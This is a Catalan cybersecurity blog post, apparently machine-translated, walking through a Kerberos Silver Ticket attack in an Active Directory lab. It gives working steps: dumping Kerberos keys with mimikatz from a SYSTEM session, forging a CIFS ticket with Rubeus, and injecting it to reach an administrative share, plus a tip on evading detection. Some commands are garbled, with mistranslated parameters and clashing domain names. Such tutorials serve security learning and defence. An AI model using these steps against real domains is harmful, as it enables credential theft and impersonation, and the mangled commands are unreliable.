Entrades Kerberos - Bitllet Plata

3 juny de 2024 Celia Catalán

Continuant amb els lliuraments de Tickets de Kerberos, a publicacions passades hem parlat sobre el Golden Ticket, en aquesta ocasió estarem parlant del Silver Ticket.

BILLET DE PLATA

L'atac Silver Ticket implica la creació d'un Ticket Granting Service (TGS), que permet als atacants obtenir accés a un servei específic en un entorn d'Active Directory sense necessitat d'autenticar-se a través del controlador de domini (Key Distribution Center, KDC ).

Aquest mètode es basa en adquirir el hash NTLM o contrasenya d'un compte de servei per falsificar un Ticket Granting Service (TGS). Aquestes credencials es poden obtenir de diferents maneres durant l'atac al Domini, com per exemple mitjançant eines com Respondre o mitjançant tècniques de Kerberoasting. Després de crear aquest tiquet falsificat, un atacant pot accedir al servei específic, fent-se passar per qualsevol usuari i, en general, amb l'objectiu d'obtenir privilegis administratius.

Si en lloc d'obtenir les credencials en text clar o hash NTLM, es poguessin obtenir les claus AES (per exemple, mitjançant un bolcat de memòria), es recomana utilitzar aquestes claus AES per a la creació dels tiquets, ja que és una manera més segura i menys detectable.

Explotació:

En primer lloc, assumirem que hem obtingut una sessió com a SYSTEM en una màquina del domini. Això, per exemple, ha pogut passar després de comprometre un servidor IIS i una posterior escalada de privilegis fent ús d'un Potato exploit.

Després d'obtenir el control del servidor, podem obtenir les claus de Kerberos amb mimikatz i l'ordre sekurlsa::ekeys

Creació del tiquet

Un cop obtingudes les claus de Kerberos, podem crear un tiquet per al servei CIFS del propi servidor, el qual ens garantirà accés a aquest com l'usuari del domini que vulguem. En aquest cas crearem el tiquet amb l'ordre:

Rubeus.exe silver /service:cifs/castelblack.north.servingkingdom.local/aes256:0ad6c98bbba174b0b2f8d9a05279fe6892cef5f0e1bab59e01b5510e9920774d/user: /serving.1-eddard.2-local -1430251130-2586379517-4083755373 /nowrap

Service: Nom del servei al qual se sol·licitarà el tiquet

Aes256: Clau aes256 del compte de màquina extret anteriorment

User: Usuari a impersonalitzar, en aquest cas un Domain Admin

Domain: Nom del domini

Sid: SID del domini

Importar el tiquet

Un cop obtingut el tiquet, podem comprovar que no tenim accés d'administració al servidor des de la consola d'usuari no privilegiat.

ls \\castelblack.north.sevenkingdoms.local\C$

El pas següent serà importar el tiquet generat anteriorment en un nou procés. Això es pot aconseguir amb l'ordre:

Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:NORTH /nom d'usuari: eddard.stark /contrasenya:PassFake /ticket: doIGGDCC[…]b2NhbA==

Program: Comanda a executar on s'injectarà el tiquet

Domain: Nom del domini

Username: Usuari del domini

Password: Contrasenya de l'usuari. No cal que conegueu la contrasenya real de l'usuari.

Tiquet: El tiquet creat anteriorment

Després de crear el procés amb el nostre Silver Ticket, ja podrem accedir al servidor en qüestió mitjançant el servei CIFS des de la nostra sessió d'usuari no privilegiat.

ls \\castelblack.north.sevenkingdoms.local\c$

Limitacions:

Un Silver Ticket és vàlid només per al servei específic per al qual va ser creat. No permet accés a altres serveis o recursos.

I amb això finalitzem el post, en aquest sentit ara sabem sobre el Silver Ticket i el Golden Ticket , queda pendent un lliurament més sobre aquests tiquets de kerbers. Fins al proper tiquet.

Álvaro Temes , anàlisi de ciberseguretat a Zerolynx .

Tornar al bloc